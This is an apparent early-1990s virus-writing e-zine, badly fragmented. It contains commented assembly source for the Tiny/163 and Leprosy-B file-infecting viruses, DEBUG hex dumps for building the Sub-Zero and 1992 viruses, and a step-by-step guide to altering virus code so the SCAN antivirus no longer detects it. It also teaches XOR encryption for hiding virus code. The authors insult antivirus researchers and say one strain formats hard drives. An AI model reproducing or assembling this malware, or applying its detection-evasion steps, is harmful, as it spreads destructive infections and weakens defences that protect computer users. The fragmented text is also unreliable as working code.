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         ����     ���� ������ ������������   ����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     ����     ����  ����  ����     ���� ����     ���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     ����     ����  ����  ����     ���� ����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   ����     ����  ����  ������������  ����           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      ����   ����   ����  ����     ���� ����           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       ���� ����    ����  ����     ���� ����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        �������     ����  ����     ���� ����     ���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�����     ������ ����     ����  ���������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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>|VIRTUAL            �����           RESISTANCE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��������           �������          ���������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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ILLUSION          ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">۲���         </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>COALITION|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everyone, and welcome to the premiere issue of VIRC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don't know what the hell this E-Mag is about,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retty friggin' obvious from the filename.  Unles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tard, you should be able to figure out that it is about Vir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H/P/A stuff....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author bears no responsibility for the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-Mag - you download and/or view this file at your own r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peration with the first amendment of the US.  The contents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as-is basis, an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0                            Viri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100                          40hex Magazine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150                         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100                          Cool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200                    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250                          Information About this E-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300                    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Virii Stuf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many of you, you want to start programming and decompiling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the hell of it.  It must give you some sort of good fee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ell... that was the feeling I got.  And it sucks shi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, who don't really care but are just doing it to blow up some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well.... go to hell because it might happen to me. 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left now?  Probably not... but just for fun, and because I'm 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mind, I'll guide you through some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or those that are decompiling, programming, and using vir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library of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5.1 or above is a MUST - you won't be able to decompil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shit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Disk Editor - you need this to edit files in Hex Mode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invisible to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e changer - Norton Disk Editor can do this, but som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know that it has changed....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, MASM, or some Assembly compiler - to compile the vir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Debugger - to compile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ere is more, but you should be able to figure out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. I'll just show you some sources (which do work, when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goodie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1992 virus source.  Just cut and pop into the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in busin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19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0  EB 02 90 02 E8 03 00 E9 E7 05 51 BB 38 01 8A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10  32 2E 03 01 88 2F 43 81 FB 00 09 7E F1 59 C3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20  00 01 8B 1E E5 06 53 E8 E0 FF 5B B9 C8 07 B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30  CD 21 53 E8 D4 FF 5B C3 0D 10 1B 00 08 B1 1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40  C1 18 22 C6 BD 1B 01 B1 1B 15 B1 1B 01 1A 1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50  C1 18 04 C6 DB 02 B3 B3 14 18 19 B3 10 DF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60  08 B1 1B 01 C1 18 0C C6 C0 18 05 C6 C3 C6 B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70  22 1A 1B 00 B1 1B 06 02 B3 B3 14 18 1D B3 10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80  22 08 C2 C6 C6 C0 C6 DB 1B 0C B1 1B 0B B1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90  1A 1B 00 B1 1B 01 02 B3 B3 14 18 23 B3 10 DF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A0  00 08 B1 1B 12 B1 1B 0B C2 C6 C6 1A 1B 00 B1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B0  00 02 B3 B3 14 18 21 B3 10 DF 22 13 1B 06 0B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C0  10 22 13 22 DC 10 22 13 22 DC 10 22 13 22 D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D0  22 13 1B 06 DC 10 22 13 22 22 DC 10 22 22 1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E0  22 DC 10 22 22 1A 1B 00 08 B1 22 22 02 B3 B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F0  18 0A B3 0D 18 1A B3 02 10 DF 14 B3 B3 B3 10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00  13 22 0B DC 02 10 18 06 B3 13 22 0B DC 22 DC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10  10 B3 B3 13 22 0B DC 02 10 B3 13 22 0B DC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0  18 06 B3 13 22 0B DC 22 DC 22 DC 22 DC 02 10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30  22 1A 1B 00 08 B1 22 22 02 B3 B3 14 18 05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40  18 1B B3 02 10 DF 22 22 14 B3 10 DF 13 1B 06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50  DC 10 22 13 22 22 DC 02 10 B3 22 22 13 22 0B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60  02 10 B3 13 1B 06 0B DC 10 22 13 22 DC 02 10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70  13 22 0B DC 02 10 B3 13 22 0B DC 02 10 B3 22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80  08 C6 C6 C0 DB 22 22 02 B3 B3 14 18 05 B3 0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90  0E B3 12 1B 05 14 18 01 B3 02 10 DF 1B 00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A0  22 22 02 B3 B3 B3 13 22 0B DC 02 10 B3 13 22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B0  DC 22 DC 02 10 B3 22 13 22 0B DC 02 10 B3 2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C0  B3 B3 13 22 0B DC 02 10 B3 13 22 0B DC 02 10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D0  22 B3 B3 13 22 0B DC 02 10 B3 22 1A 22 22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E0  1B 00 02 B3 B3 14 18 05 B3 0D 18 0E B3 12 DC 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F0  D9 02 14 B3 B3 B0 B0 0D 12 D9 14 B3 B3 B3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00  DF 1B 01 08 B1 22 13 1B 06 0B DC 02 10 B3 1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10  0B DC 02 10 B3 13 22 0B DC 02 10 B3 13 22 0B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20  02 10 B3 13 1B 06 0B DC 02 10 B3 13 22 0B DC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30  10 B3 1B 00 13 22 0B DC 02 10 B3 22 1A 22 2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40  B1 1B 00 02 B3 B3 14 18 05 B3 0D 18 0E B3 12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50  D9 D9 02 14 B3 B3 B3 B0 0D 12 D9 14 B3 B3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60  DF 1B 06 08 B1 22 22 02 18 07 B3 22 B3 B3 2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70  B3 22 B3 B3 22 18 07 B3 22 B3 B3 1B 00 B3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80  22 1A 22 22 08 B1 1B 00 02 B3 B3 14 18 01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90  B3 B3 B3 02 B3 0D 18 0E B3 12 DC 18 07 D9 14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A0  B3 02 10 DF 1B 01 08 D8 C6 DB 1B 18 D8 C6 C6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B0  BD 22 22 1A 22 22 B1 1B 01 02 B3 B3 14 B3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C0  0D 18 18 B3 02 10 DF 1B 00 08 C1 18 04 C6 C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D0  16 C6 DB 1B 00 B1 22 22 1A 22 22 C1 18 01 C6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E0  02 B3 B3 0D 14 18 1F B3 02 10 DF 22 22 08 B1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F0  07 16 22 0D 14 56 16 6A 67 22 6F 63 6C 22 75 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00  6D 22 60 70 6D 77 65 6A 76 22 7B 6D 77 22 1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10  22 08 B1 22 22 1A 22 22 B1 1B 01 B1 02 B3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20  14 18 1E B3 02 10 DF 1B 00 08 B1 1B 01 02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30  16 22 0D 34 30 30 2E 22 51 69 6B 71 6F 22 4D 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40  67 2E 22 41 63 72 76 6B 63 6C 22 10 22 22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50  22 22 1A 22 22 B1 1B 01 B1 02 B3 B3 0D 14 1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60  B3 02 10 DF 0D 14 18 05 B3 02 10 DF 1B 01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70  1B 01 02 B3 B3 16 22 0D 56 70 6B 72 71 2E 2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80  6C 66 22 51 77 60 2F 58 67 70 6D 22 6C 6D 7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90  10 22 22 08 B1 22 22 1A 22 22 B1 1B 01 B1 0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A0  B3 0D 14 18 10 B3 02 10 DF 1B 01 08 B1 1B 05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B0  1B 01 02 B3 B3 16 22 0D 71 6A 63 6C 69 71 22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C0  6D 77 22 63 65 63 6B 6C 2E 22 22 75 6B 76 6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D0  10 22 22 08 C2 C6 C6 1A 22 22 B1 1B 01 B1 0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E0  B3 0D 14 18 10 B3 02 10 DF 1B 01 08 C2 C6 C6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F0  1B 06 C1 C6 BD 22 22 02 B3 B3 16 22 0D 6A 6B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00  22 6E 63 76 67 71 76 2C 2C 2C 1B 08 10 1B 06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10  22 22 08 C2 C6 C6 C0 C6 C3 02 B3 B3 0D 14 1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20  B3 02 10 DF 1B 07 08 B1 1B 06 B1 22 B1 22 2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30  18 1A B3 1B 04 1A 1B 06 08 B1 22 22 02 B3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40  14 18 15 B3 02 10 DF 22 22 08 B1 1B 06 B1 22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50  18 1E C6 BD 1B 01 1A C6 C6 C0 C6 C6 DB 22 2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60  B3 B3 0D 14 18 14 B3 02 10 DF 1B 00 08 C1 C6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70  C6 C0 C6 DB 1B 07 17 22 0C 51 69 6B 71 6F 2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80  3B 3B 30 22 2F 22 54 6B 70 77 71 18 01 23 2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90  22 08 C1 18 01 C6 1A 22 22 B1 1B 06 02 B3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A0  14 18 0A B3 02 10 DF 1B 0A 08 D8 18 04 C6 DB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B0  00 B1 1B 07 02 B3 B3 17 1B 01 0D 45 67 76 2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C0  22 6E 63 76 67 22 72 63 71 71 23 1B 01 10 2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D0  B1 1B 01 1A D8 C6 DB 1B 00 02 B3 B3 0D 11 18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E0  D9 14 D9 D9 12 DF 10 1B 07 08 B1 1B 08 B1 1B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F0  02 18 1A B3 22 22 08 B1 1B 01 1A B1 22 02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00  0D 11 18 19 D9 02 10 DF 1B 05 08 B1 1B 11 D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10  09 C6 DB 1B 01 1A 02 B3 B3 0D 12 18 22 D9 D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20  1B 06 08 B1 1B 11 B1 1B 12 1A 0D 12 18 21 D9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30  10 1B 01 08 C2 18 11 C6 DB 1B 12 1A 28 02 28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40  47 5A 47 02 5E 02 01 3D 3D 3D 3D 3D 3D 3D 3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50  22 22 11 01 02 02 02 28 D3 EF 48 13 68 7B D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60  02 02 02 02 46 4D 51 02 22 22 22 2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70  02 01 3D 3D 3D 3D 3D 3D 3D 3D 47 5A 47 05 07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80  23 02 28 D3 EF 48 22 2A 00 23 02 00 02 02 02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90  43 50 45 47 50 2C 47 5A 47 02 02 02 95 32 4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A0  73 04 95 32 02 56 47 4F 5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B0  02 02 02 02 02 02 02 02 0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C0  02 02 02 02 02 02 02 02 0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D0  02 02 02 02 02 02 02 02 0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E0  02 02 02 02 02 07 02 2A 00 23 02 22 02 CF 2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F0  02 BA 02 32 CF 23 3E 01 70 29 B6 2E CF 23 8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00  01 03 B6 28 CF 23 82 F8 1B 7E 06 3E 07 76 01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10  77 92 BC 3A 03 BA 02 BA 8C C2 BD 02 02 BB 06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20  EA 07 02 E9 FC EB 88 02 E1 59 89 D5 31 C2 F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30  3E 22 70 07 A9 E0 FA E9 4E 3E 12 71 05 82 E6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40  08 E2 E9 F3 3E 1A 76 11 71 1B 2E 12 00 C2 00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50  00 C2 00 C2 82 E6 8D 08 E2 E9 D8 83 C0 A2 0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60  F8 E9 D0 3E 19 70 05 77 CE 82 F6 82 E9 C5 3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70  89 DB AE 88 CA B2 22 76 00 AE 49 30 EF 43 F1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80  89 C9 4B E2 A8 C1 B8 44 04 B6 18 CF 23 B6 1B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90  23 88 D2 FC C0 B6 45 BC A7 04 CF 23 B8 46 04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A0  39 CF 23 BB 11 02 B8 3E 04 B6 4C CF 23 3F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B0  77 01 E9 53 92 B6 4D CF 23 3F 10 02 76 45 B8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C0  04 B6 39 CF 23 B6 2D CF 23 8E 04 9E 04 8B 1C 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D0  04 B8 73 04 B6 18 CF 23 BB 05 02 B8 3C 04 B6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E0  CF 23 3F 10 02 77 23 B6 4D CF 23 3F 10 02 77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F0  B8 46 04 B6 39 CF 23 B6 18 8C 1C 9E 04 89 14 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00  04 CF 23 E9 B2 E9 7B 92 B6 2D CF 23 8E 04 A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10  8B 1C A2 04 B8 8D 04 B9 73 04 89 45 1A A1 E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20  89 45 14 A1 E5 04 89 45 17 BA 02 41 CF 23 8B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30  E9 04 BA 03 41 31 CB CF 23 BA 02 3F CF 23 7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40  A1 E7 04 B6 3D 89 1C E7 04 BB 00 02 B8 EF 0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50  23 B6 3C 89 1C E7 04 CF 23 89 1C EF 04 83 F9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60  00 77 0D B6 18 8C 1C A0 04 89 14 A2 04 CF 23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70  77 FD B8 8D 04 BA 00 3F CF 23 A1 E7 04 EA 9D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80  BA 03 55 89 1C E7 04 89 0C E5 04 89 14 EB 0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90  23 BA 03 41 89 0C E9 04 B8 8D 04 CF 23 B6 39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A0  46 04 CF 23 B6 39 B8 A7 04 CF 23 BA 02 4E C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B0  4F 61 43 64 67 67 22 75 70 6D 76 67 22 55 6A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C0  6E 67 23 23 23 23 23 23 1A 1A 1A 1A 1A 1A 1A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stop cutting her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see what it do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omething written in Assembly,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cut here ----- figure it out!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Virus Disk Killer [Killer]      Sourced by VIRC HEAD DU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miestnenie:  Boot sector - subor Killer1     (360 or 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yl 9, Side 0, Sect 5,6,7,8,  OLD_BOOT 9  - subor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MART                         ;Vypni optimalizaciu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_Top         equ     4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14         equ     1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5         equ     1f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6         equ     1f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7         equ     1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9e        equ     8A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0e        equ     8A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2e        equ     8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3e        equ   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4e        equ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5e        equ  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6e        equ    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7e        equ    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8e        equ    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9e        equ    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 equ    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equ     1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2e        equ     1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3e        equ     1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1        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killer1, ds:kill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cli                                     ;Dis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run_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MSDOS3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, 2, 2, 1,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70h, 0, 0D0h, 2, 0FD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          dw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          dw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9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2h, 0, 0, 0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, 0FAh, 33h, 0C0h, 8Eh, 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Ch, 0, 0, 0CBh, 3Ch,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5          dw      0A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6 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7          dw     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8 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9 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55h, 0, 0, 0, 0,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virus:      mov     ax,cs:Ram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ax                   ;DS = Ram to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word ptr ds:3eh,3CC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ax,cs:[23Bh]            ;Load effectiv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  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1:          mov     ax,7C00h                ;Nastavenie zasob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ax                   ;71D4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s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p,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  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rive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ds:data_23e          ;(7B00:000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data_26e          ;(7B00:0042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28e,ax          ;(7B00:0046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s:data_27e          ;(7B00:004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29e,dx          ;(7B00:0048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2:      push    cx                      ;Backup C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3                    ;Set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3:      push    cx                      ;Backup C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                      ;Restore C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read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                    ;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3               ;Loop &amp; Dec erro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8h                     ;ROM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ok:        call    sub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data_28e          ;(7B00:0046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s:data_29e          ;(7B00:0048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ds:data_23e          ;(7B00:000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                      ;Restore C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2               ;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:Ram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8                    ;Reserved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s:Ram_Top,ax           ;Set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cl                   ;Conver to segment ad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0A00h                ;Virus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b                   ;Copy virus to Ram Top Now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data_23e          ;(7B00:000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                            ;Jmp fa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1:          mov     ax,ds:data_28e          ;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28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no_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word ptr ds:data_29e    ;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arry:      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2:          div     word ptr ds:data_24e    ;(7B00:0018=0) ax,dxrem=dx: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32e,dl          ;(7B00:0140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dx                   ;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     word ptr ds:data_25e    ;(7B00:001A=0) ax,dxrem=dx:a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head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33e,ax          ;(7B00:0141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ena:         mov     ax,data_12              ;(7340:0141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data_3               ;(7340:001A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cx                      ;dx:ax = reg *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l,data_10              ;(7340:013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c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data_2               ;(7340:0018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cx                      ;dx:ax = reg *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data_11              ;(7340:0140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c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c  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ata_7,ax               ;(7340:0046=4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ata_5,ax               ;(7340:0042=0A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ata_8,dx               ;(7340:0048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ata_6,dx               ;(7340:004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0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1         db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12         dw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3:          mov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4h,3,0EB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6:          mov     dx,ds:data_33e          ;(7B00:0141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h,cl                   ;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h,ds:data_32e          ;(7B00:0140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ds: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h,ds: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3h                     ;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, 0F6h, 6, 4Ah, 0,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74h, 5Ah, 0E8h, 57h, 0, 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72h, 53h, 0B9h, 4, 0, 0B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E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7:      mov     ah,ds:data_19e[bx]      ;(7340:08A2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8                   ;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7               ;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ds:data_14,0FFh ;(7340:01F3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8:          mov     dl,data_9               ;(7340:004A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15,dl           ;(7340:01F4=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data_20e[bx]      ;(7340:08A3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h,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16,ax           ;(7340:01F5=1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byte ptr ds:data_20e+1[bx]   ; (7340:08A4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h,cl                   ;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ds:data_22e[bx]      ;(7340:08A5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17,ax           ;(7340:01F7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ds:data_14,55h ;(7340:01F3=0)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data_17           ;(7340:01F7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ata_12,ax              ;(7340:0141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data_16           ;(7340:01F5=1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ata_10,ax     ;(7340:013F=9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90h, 0B8h, 0, 0, 0A3h,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, 0FEh, 0C4h, 0A3h, 3F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9:          mov   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10:     push    cx                      ;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                      ;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10              ;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11:         stc                             ;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2:         clc                             ;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1 dup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    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     0AA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1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stop cutting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eavy duty virus.  I tried this on the 8086 I got from my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 meg HD disk head crashed and destroyed the HD.  I meas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and it had gone up about 80 degrees above what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This is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virus, and my HD light started to flash really fast and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 started to make noises faster and faster - as if it wer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quickly.  I started to hear some sort of snapping noise in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cracked, and smashed on the drive or something, and the H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The disk light turned off, and my computer was froze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pened it up, and it turned out that the whole thing was about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e.  I measured the temperature, and it came out to about 210 degr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out another five meg buger from the case, and let it ru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  I measured the temperature, and it was a measly 14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powerful virus.  It also shows that MSDOS command.com ha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jump points - as shown by jmp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show you what viruses you should get your hands on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ing of my HD on my new 8086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COM     1124   3-29-94  1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COM     2000   4-02-94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COM     9218   3-29-94  1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COM     1152   1-02-80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     COM      995   3-30-94   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UE    COM     3107   3-30-94 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O20 COM      787   3-30-94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COM      666   6-03-91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     COM      812   4-27-92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 COM     1815   3-29-94  10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R COM      697   1-22-95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    COM     1024   1-22-95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  COM     1992   8-20-91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COM      102   1-22-95   3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2 COM     1319  12-27-92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COM     2148   3-30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COM      544   3-29-94  1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COM     1264   4-26-90   7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EL ZIP   127828   2-15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ST  COM     1008   3-04-91  1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STA COM     1008   8-04-92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G  COM     1027   4-07-91   6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T  COM     1299   5-31-92   6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COM     6586   9-05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 CCC      430   4-18-90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_JERB  EXE    33280  10-16-88   4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P     EXE    76523  12-22-88   3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COM      611   6-06-93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-B   COM     1024   2-23-92  1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  COM     1776   3-02-92  10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1 EXE     4166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HECK  EXE       79   4-25-91   9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2 EXE     7178  12-28-90   9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EXE     5936  12-18-91   9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C   COM     1024   1-03-80   5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    COM      272   4-06-94   6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2 COM     6158  12-28-90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3 EXE     4622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EXE     3855   1-01-80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PORN3 EXE    55424  11-11-91  11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OM  EXE     3936   6-13-90   6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3 COM     3610   3-01-91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IDAY  COM     5911   6-01-89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     COM     1273   2-01-92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!TIGER   COM     5911  10-26-89   6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COM      168   8-04-90  1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 COM     1870   1-26-91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 COM     2400  10-16-89  1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   EXE     2331   1-01-80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-SBC COM     4595   6-03-91  1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PSCR COM     2048   2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    COM     2073   2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B    COM     1708   1-01-80  12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COM      111   1-05-91   6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B     COM      846  11-07-92   3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YTE-V COM     2562   2-09-92   4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S   COM     7058  10-11-91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S3  COM      908   9-11-91   9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T3  COM      780   2-09-92   4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 COM     1337   4-04-91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 COM     1253   6-08-91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COM     2250   6-08-90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B-DR EXE     6408  11-10-87   8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D    COM     2250   6-08-90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M    COM     2452   2-26-92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    COM     2004  12-20-90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    COM     1371   4-08-92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DE   COM     1292   1-03-91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  COM     1312   2-27-89  1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  COM     1669   8-05-91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-D   COM     2583   4-23-92   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COM     2048   3-30-94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4 EXE     4788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COM      206  10-12-92 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3     EXE     3145  10-08-91   6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ESA   COM     1653   1-21-91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COM      489   5-06-92  10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S   COM     1077   2-05-92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A    COM      512   2-09-92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    COM      512   1-18-91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D    COM      512   2-09-92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E    COM      512   2-09-92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F    COM      512   2-09-92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X    COM      640   1-24-91   6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    COM      512   4-29-91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    COM      499  11-14-91   5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4 COM     3776   3-01-91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      COM     1924   2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 COM     1404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_C COM     1404   9-28-92   8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66C      COM      617   1-20-92   6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ON2    COM      336   9-03-91  1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ON4    COM      288  11-05-91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UNES   COM    10163   1-06-91   9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    COM      637   8-06-92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COM       97   4-10-92   5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_02   COM      423   3-07-93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    COM      923  11-30-92   5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_IT  COM     3361  12-02-93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EZ    COM     3297  12-02-93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    COM     3297  12-02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CIA COM     3585  12-02-93   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SLEY  COM     3201  12-02-93   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COM     3297  12-02-93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STER  COM     3553  12-02-93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   COM     1298  11-17-93   3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9  EXE     2592   7-22-93   9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-109 COM     3680   1-13-92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SHK  EXE     4304   1-19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  COM     2256   1-11-91 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MEDA  COM    32004   4-13-90   9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-299 COM      301   2-08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COM     4176   3-21-91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URG COM      343   2-11-91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     COM     1960   1-02-80  12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   COM     6077   2-08-92   9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   COM     1798   2-29-92  1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5 EXE     4588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COM      666   2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COM     1139   4-21-91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2  COM     1139   4-21-91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-B  COM      247   3-08-91   9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  COM     4053   1-01-80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DAY  COM     1087   1-01-80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-ROSS COM     3117   3-29-94  1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TRO    19200  11-04-89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CHEV  COM     5074   1-01-80   1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 COM      256  10-25-91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3 COM      321   9-12-70   8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 COM      850   8-20-92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    COM      947   2-12-92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5 COM     3576   3-02-91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6 COM     3289   1-01-80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COM      571   9-30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  COM      306   5-31-93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1  EXE     4688  10-14-91   3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7 EXE     4166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COM     1278   9-04-91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  COM      233   1-18-91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COM     1417   3-04-91  1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  COM     1071   4-05-94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ROACH COM      614   7-22-93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COM     8444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OM     1383   7-11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EXE     4912   7-11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21C EXE    17772   7-11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-1  COM     256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     COM      596   1-01-00   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 EXE     2287   1-14-90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OLIVB EXE     213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OLIVG COM     213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VAR4  COM     213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   COM      790   4-05-94   3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-2  COM      345   3-29-94  1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 COM     1328   2-20-91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OW COM       70  12-15-91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OW DMP      803  12-15-91  1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1 COM      234   4-06-94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 COM      250   4-06-94  11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COM     1176   2-22-94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4 COM      936  11-23-92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BOMB COM      400   9-04-91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7 COM     3154   3-01-91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EXE     1780   3-29-94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N#1   EXE     1490   8-01-92   2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UCK  EXE     4212  11-22-90  10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N-A COM     2416   3-01-91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H   COM     3844   1-16-94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YOU  COM     2535   4-03-91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COM     2104   1-31-91   9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KILL  COM      699   7-22-93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   COM     3030  11-16-92   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   EXE     5774   5-26-91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BUG COM     1401   1-01-80  12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     COM      639   4-05-94   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COM     1146  12-29-91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COM     3149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-4  COM      56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213 COM      215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KILL EXE     9189  10-16-91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  COM     4808  11-04-92  1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    EXE     2219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-224 COM      229  12-15-92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COM     1639  10-09-92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II   EXE      680   1-15-92  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1     EXE     1200   7-16-89  11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2     EXE     1224   7-26-89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-199 COM      202  12-15-92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C EXE      704   1-15-92  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ARAT COM     1202   3-16-91  10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COM      177   5-28-93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-528  COM     1528   7-02-92 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DROP COM     1280   4-21-93   7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2 COM      977   7-09-93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 COM      736   8-31-90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JOKER COM     1496   8-31-90   5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COM      639   3-30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    COM     5454   8-10-93  10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COM     1574   4-07-94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-A    COM      666   6-03-91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2  COM      653  12-07-88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LD COM      842   3-16-91   6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JR   COM      751   4-06-94  1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COM     2029   4-06-8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 COM     1870   3-29-94  1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    COM     4365   1-01-91   9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    COM      728  10-27-92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TE   COM     1375   6-11-92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H_1 COM     846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COM     2465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   EXE     9728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XE    21967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      COM       9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COM      41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-V04  COM      508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   COM      555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Y   COM      83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X    COM      53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GREET COM     3149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BOY!  COM     4176  12-13-90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 COM     1150  10-02-91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COM     6316   3-18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X2000 COM     2000  10-13-90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COM    10000   2-06-91  10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      COM      612  10-02-92   3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-EVIL  COM     1705   2-08-92  1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    COM     3128   6-01-91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747B COM     1875  12-22-91  1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UM   COM      228   4-06-94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X     COM      853   3-30-94   3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COM     1202   3-16-91  10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  COM     1201   7-27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   COM      921   3-30-94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M9   COM     1817   1-01-80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   COM     5136   2-08-92   9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COM     2975   7-21-91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COM     1999   3-29-94  1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COM     4364   4-07-94   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COM      960   3-30-94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EXE    12468   2-06-91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  COM     2109   3-29-94  1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ER   COM      756   1-01-80   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R!   COM    12145  10-13-88   2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se virii are really no big deal, but some are real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large amount of powerful virii here, and som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real shit to you.  Don't run any unless you got some cr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can format.  For those of you that really want to try a vir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HOENIX.COM - it won't really do some bad shit, but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your computer up.  Just take a look at it, nothing happe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computer, and see how many files have been infected.  Re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disk, and scan again.  Reboot again - even if the sca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gain from the disk, and begin to delete ALL of the COM,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scan again, and copy the files back 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ther deleting all of these files, then rename many of the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you don't want to replace.  Make sure that you kee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the virus will be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one type of virus - the kind that tries to screw you ov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everal that don't do anything like that of the sort -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the programs you have on your computer and disk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op in and out of your disk drives.  It isn't visible in memor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infective.  However, it does have stealth techniques (III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programming in assembly.  I have also written anothe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of the password files in QModem, Telix, ProComm, and Rene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sk.  Basically, it just looks for these files, and loa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AM.  Once you pop in a certain disk with a certain labe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se files automatically to the disk, and boom... I screw you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f you are interested, the Phoenix viru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you got it.... cut it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9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     Decompiled by the Gatekeeper of VIRC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                            PHOENIX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     Created:   2-Apr-94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     Passes:    9          Analysis Options on: LZ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    EQU   'T3'                      ; Target assembler: TASM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sr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equates show data references outside the ran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1E         EQU    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E         EQU     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low_      EQU     46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E         EQU     6D0H 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4E         EQU     3    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5E         EQU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6E         EQU   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7E         EQU    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8E         EQU     8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7E        EQU     17C5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8E        EQU     17C6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9E        EQU     17D9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0E        EQU     17DB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1E        EQU     17DF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2E        EQU     802C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3E        EQU     8280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4E        EQU     8284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5E        EQU     8385H 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6E        EQU     0FA53H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37E        EQU     0FFFAH          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_A           SEGMENT BY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SEG_A, DS:SEG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3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D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CS:[SI+1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S     LOC_1                   ; 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S:[DI+1F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S     LOC_2                   ; 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                             ;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0F8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ES:[DI+78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 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BYTE PTR [DI+2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B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3 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7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6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2EH                  ;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NE   SCASB                   ; Rep zf=0+cx &gt;0 Scan es:[di] f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WORD PTR [DI],1E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4 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[D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DATA_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7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WORD PTR [DI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WORD PTR [DI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H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WORD PTR DS:[157H]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I,DI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6 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B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                           ; String [si]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7 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                           ; Store al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5               ; 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SW                           ; Scan es:[di] fo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3D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                   ; Rep when cx &gt;0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WORD PTR ES:[DI-6]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                           ; Store al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9 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8 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LOC_9                   ;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                  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1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No entry poin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[DI+77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11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ATA_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BX,DWORD PTR [DI-30H]   ; Load 32 bit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FH                     ; Get &amp; set DOS disk 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ds:dx=new handler, es:bx=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 un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0F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60H,AL                  ; port 60H, keybd dat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61H,AL                  ; port 61H, 8255 B - spk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al = 0, disabl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3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13H                     ; Disk  dl=drive 0  ah=func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write sectors from mem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al=#,ch=cyl,cl=sectr,dh=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10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L,40H            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ADD     SI,0FF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83H,0C6H,0C5H          ;  Fixup - by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DATA_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ATA_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SI+0B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[SI+0B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16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W                           ;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                           ;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W                           ;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W                           ;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PTR CS:[BX]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                   ; Rep when cx &gt;0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[DI],4DH       ;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+3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ES:[DI+3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set active PSP segmnt from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 un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BX,[SI+9]               ; Load effectiv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No entry poin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STOSB                   ; Rep when cx &gt;0 Store al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00H, 00H, 00H, 00H,0C3H,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FDH, 00H, 00H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21H,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[SI+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[SI+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[S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LOC_18                  ; Jump if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ES:[BX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17              ; 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LOC_21                  ; Jump if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ES:[BX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20              ; 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19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I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I,CL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I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15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SI+1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LOC_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1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3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                             ; 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ATA_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YTE PTR [DI-3],5AH     ;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22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RET_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3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4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RET_23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1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FH                     ; DOS Inter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 un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24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12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FH                     ; DOS Inter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 un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RET_23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[DI+2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WORD PTR [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DI+17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DI+15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4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DH,[DI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28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3EH                  ;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25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CL,[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29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S:DATA_22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[DI+28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58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26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4F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27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[DI+2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D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26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[DI+22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26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[DI+2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0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4BH                  ;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0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LOC_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ATA_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read file,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cx=bytes to ds:d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33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5A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4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4D5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4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X,ES:[DI+13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33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4D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4F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ES:[DI+1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8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3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2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1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H,0A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DS:[14BH]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32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2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                           ; String [si]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Z   LOCLOOP_31              ; Loop if zf=1, cx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29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35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36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28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SI,SI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6D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LOC_35                  ;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ES:[DI+12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38H                  ;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28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D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ES:[DI+1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     SI                      ; ax,dx rem=dx:ax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DS:DATA_27E,0E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28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LOC_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[SI+16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3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+6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1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SI+0C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SI+14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C                             ;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3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CX                      ; dx:ax = reg *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+4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[SI+16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8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WORD PTR [SI+0AH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9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7F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41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41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1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40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37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[SI+16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38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DL,0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D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D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7E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42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SI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S     LOC_42                  ; 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4D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43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C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4F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C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C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44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44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YTE PTR ES:[DI+15H],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read file,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cx=bytes to ds:d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49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ES:[DI+15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ATA_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L,DL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SW                           ; Scan es:[di] fo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LOC_48                  ; Jump if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     AX,1                    ;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     AX,1                    ;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     AX,1                    ;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     AX,1                    ;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BL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C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47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46              ; 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45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ATA_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C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write file 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cx=bytes from ds:d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54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ES:[DI+1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S:DATA_29E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S:DATA_30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3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5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D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     CX                      ; ax,dx rem=dx:ax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6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7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     DL                      ; al, ah rem = ax/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OFFSET DATA_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5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OFFSET DATA_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5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2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                           ; String [si]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3FH                  ;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53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T                            ; al=[al+[bx]]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CL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52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T                            ; al=[al+[bx]]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CL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DS:DATA_36E[SI]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S:DATA_36E[SI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51              ; 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55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59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ES:[DI+1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1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DS:[14BH],0A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write file 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cx=bytes from ds:d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59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D                             ; Word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7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   AL,DX                   ; port 0, DMA-1 bas&amp;add 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   AL,DX                   ; port 0, DMA-1 bas&amp;add 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OFFSET DATA_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BYTE PTR DS:[5ACH][SI]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57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                           ; Mov [si]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CMP     SI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81H,0FEH, 20H, 00H     ;  Fixup - by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56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3D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LOOP_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                           ; String [si]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DATA_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LOCLOOP_58              ; Loop if cx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[SI+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[DI-20H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            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59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:[DI+15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ATA_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write file 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cx=bytes from ds:d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5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H,3EH                  ;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WORD PTR [DI+1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WORD PTR [DI+17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61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[DI+0D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61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YTE PTR [DI+0DH]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BYTE PTR [DI+5],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40H                  ;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[DI+6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close file,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4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5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                  ;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63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7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                  ;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DATA_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read file, bx=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 cx=bytes to ds:d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5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9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5D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5D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C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LOC_64                  ;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T                            ; al=[al+[bx]]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T                            ; al=[al+[bx]]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AT                            ; al=[al+[bx]]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9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2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D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0F77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RET_65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L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RET_6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12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3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External Entry into Subroutin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W                             ; Conv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66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E     LOC_RET_70              ; Jump if below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AX,[DI+1FH]             ; Load effectiv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BYTE PTR DS:[157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WORD PTR DS:[157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                           ; Store al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67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   AL,DX                   ; port 0, DMA-1 bas&amp;add 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67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AH                      ; ax = reg *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L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8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-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L,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LOC_68                  ;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69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YTE PTR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6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20H                  ;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RET_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13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No entry poin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S:DATA_33E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ADD     BYTE PTR DS:DATA_32E[BX+SI]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82H, 80H, 2CH, 80H, 09H        ;  Fixup - by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YTE PTR [BX+SI]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S:DATA_34E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YTE PTR [BX+SI],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YTE PTR [BX+SI]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S:DATA_35E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YTE PTR [BX+S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BX+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BX+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BP+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WORD PTR DS:[707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L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                             ;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                             ; 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3EH                  ;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71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ATA_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resolve path ds:si to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 un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open file, al=mode,name@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7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DATA_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7B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7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+44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+46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DS:timer_lo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DATA_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4BH                  ;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72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3EH                  ;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79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LOC_79                  ;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                           ; String [si]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5CH                  ;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73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72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2E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W                             ; Conv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get DTA ptr into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OFFSET DATA_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set DTA(disk xfer area)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ATA_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find 1st filenam match @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78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DATA_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77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OFFSET DATA_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                           ; String [si]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                           ; Store al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75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[SI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45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76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4D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77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3H                  ;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2EH                  ;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[SI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78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find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74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set DTA(disk xfer area)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79                  ; Jump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ATA_3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 DOS Services  ah=function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  open file, al=mode,name@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7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WORD PTR [SI+46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WORD PTR [SI+44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WORD PTR [SI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WORD PTR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F                            ; Po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FAR PTR $-7D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56H, 57H,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0         DW      6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1         DB      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ECH,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2         DW      82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7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3         DB      5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4         DB      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D8H, 3BH, 46H, 0CH, 75H,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8H, 18H, 12H,0CDH, 2FH, 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C8H, 3BH, 44H, 14H, 74H,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ADH, 80H,0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5         DB     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74H, 1FH,0FEH,0CCH, 74H,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26   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0DH, 75H, 30H,0C4H, 7CH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26H, 81H, 7DH,0FEH,0CDH,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75H, 25H, 